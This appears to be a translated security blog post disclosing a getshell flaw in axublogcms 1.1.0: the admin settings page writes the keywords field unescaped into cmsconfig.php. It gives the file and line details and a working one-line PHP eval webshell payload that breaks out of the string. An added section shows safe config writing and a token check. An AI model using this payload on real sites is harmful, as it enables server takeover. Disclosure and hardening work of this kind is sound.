The latest version of axublogcms1.1.0 Getshell


code execution vulnerability

The latest version is now 1.1.0. Today I re-audited axublogcms 1.0.6 and found a rather tasteless vulnerability, one that exists not only in version 1.0.6 but also in the latest version.

Writing to the configuration file from the admin back end gives a shell directly.

Download the latest version of the source code and install it. For details, see the article I wrote before (http://www.cnblogs.com/Oran9e/p/7846987.html).

Once the installation succeeds, log in to the admin back end.

The basic settings page does not filter its input, so submitted values are written to the configuration file as-is and executed as code.

Now for the code analysis.

./ad/setconfig.php, lines 97 and 102

The submitted parameter $webkeywords is substituted in directly, with no escaping or any other sanitization.

So a one-line webshell can be written here. As line 97 shows, the ../cmsconfig.php file is included directly, so the one-liner is written straight into cmsconfig.php.

Insert the one-liner in the keywords field. The preceding webkeywords value has to be closed and the trailing double quote balanced, otherwise the PHP file is incomplete and will not run.

For example: 123456";@eval($_POST['a']);$a="

Now look at what was written to ./cmsconfig.php

The write succeeded; now verify it.
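
A defender's view of the bug described above, as an added example that is not part of the original article or of axublog's code: the unescaped double-quoted write next to a var_export()-based writer, plus a token check that refuses to save a config file containing anything other than literal assignments. The function names and the one-variable config layout are assumptions made for illustration.

```php
<?php
// Added illustration; not axublog's code. Function names and the config
// layout (a single $webkeywords assignment) are assumptions.

// Pattern the article describes: the raw value is pasted between double quotes,
// so a double quote in the value ends the string and the rest becomes PHP code.
function render_config_unsafe(string $webkeywords): string
{
    return "<?php\n\$webkeywords=\"" . $webkeywords . "\";\n";
}

// Hardened form: var_export() emits a single-quoted PHP literal and escapes
// backslashes and single quotes, so the value cannot terminate the string
// and no variable interpolation takes place.
function render_config_safe(string $webkeywords): string
{
    return "<?php\n\$webkeywords=" . var_export($webkeywords, true) . ";\n";
}

// Defence in depth before the file is saved: a config file should contain only
// assignments of literals, so any other token (calls, @, eval, ...) is rejected.
function config_is_data_only(string $php): bool
{
    $allowed = [T_OPEN_TAG, T_WHITESPACE, T_VARIABLE,
                T_CONSTANT_ENCAPSED_STRING, T_LNUMBER, T_DNUMBER];
    foreach (token_get_all($php) as $tok) {
        if (is_array($tok)) {
            if (!in_array($tok[0], $allowed, true)) {
                return false;
            }
        } elseif ($tok !== '=' && $tok !== ';') {
            return false;
        }
    }
    return true;
}

// The keyword value quoted in the article, used as test input.
$input = '123456";@eval($_POST[\'a\']);$a="';

echo "unsafe writer, article input: ";
var_dump(config_is_data_only(render_config_unsafe($input)));
echo "safe writer, article input:   ";
var_dump(config_is_data_only(render_config_safe($input)));
echo "safe writer, ordinary input:  ";
var_dump(config_is_data_only(render_config_safe('php, blog, cms')));
```

The more robust design is to keep user-editable settings out of executable PHP altogether, for example in a database row or a JSON file that is parsed rather than included.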


Source code link (link: https://pan.baidu.com/s/1QML_lTny4h30n2mH4uKTeA password: di3b)

Link to this article: http://www.cnblogs.com/Oran9e/p/8981705.html. Reproduction without permission is prohibited.
